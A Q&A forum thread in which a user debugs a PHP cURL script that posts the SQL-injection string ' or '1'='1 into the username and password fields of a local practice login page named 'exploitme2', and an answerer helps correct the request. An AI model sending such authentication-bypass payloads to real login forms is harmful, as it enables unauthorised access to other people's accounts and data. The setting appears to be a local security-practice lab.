0

I am trying to:

  1. access $url
  2. Insert the (2) values, of the two indices into the corresponding input fields (username,password) then submitting.
  3. finally grab the response from inputting and submitting in #2 and outputting the response.

I have the following code:

  <?php
# get url to form
$url = "http://localhost/exploitme2/index.php?page=login.php";
$ch = curl_init($url); # initialize that form

#run value of $_POST variable in form fields from above url.
$params = array("'' or '1'='1'", "'' or '1'='1'");

curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);  #set parameter $_POST fields
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
$result = curl_exec($ch);

## echo the result from cURL 'ing
echo $result;

curl_close($ch);
?>

I get this error:

 syntax error, unexpected '=', expecting ')'

on this line:

$params = array($_POST['username']=>'' or '1'='1', 
                $_POST['password']=>'' or '1'='1');
Improve this question
2
  • Are you trying to create a script to brute force a login form? The word expolitme2 sets off a red flag for me =o\ Commented Dec 27, 2012 at 4:08
  • Eventually, in a white-hat sense. Commented Dec 27, 2012 at 4:09

1 Answer 1

Reset to default
1

In technical terms, this is all just 1 step operation and not 3. You have already completed all those 3 steps. When you post those values to the above url then your result will be stored in your $result variable as per your code, just need to return / display it. for cURL it is not like you have to visit a url first and then submit next, if you know the field names and the action url then you can do all those 3 things in 1 step like you have already done

try an echo for this variable

$result = curl_exec($ch);
**echo $result;**
curl_close($ch);

Ok let me clearify some confusions here

1) You don't have to specify the variables in $_POST array. Your cURL POST variables can be any. They don't have to be in $_POST.

2) You have to post the data to the form's action url and not its own url, (unless ofcourse both are same)

So for 1 your code should be like

$params = array("'' or '1'='1'", "'' or '1'='1'");
Improve this answer
Sign up to request clarification or add additional context in comments.

3 Comments

Mind showing a code sample here? I appreciate the understanding you've provided so far.
Please see my updated answer. My array value's for $_POST['username'] and $_POST['password'] wont work because the actual value I'm trying to input is *** ' or '1'='1 *** but the single quotes are throwing it off. How can I do this?
please see updated code, it now will not load the page at all stating: "The connection was reset"

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.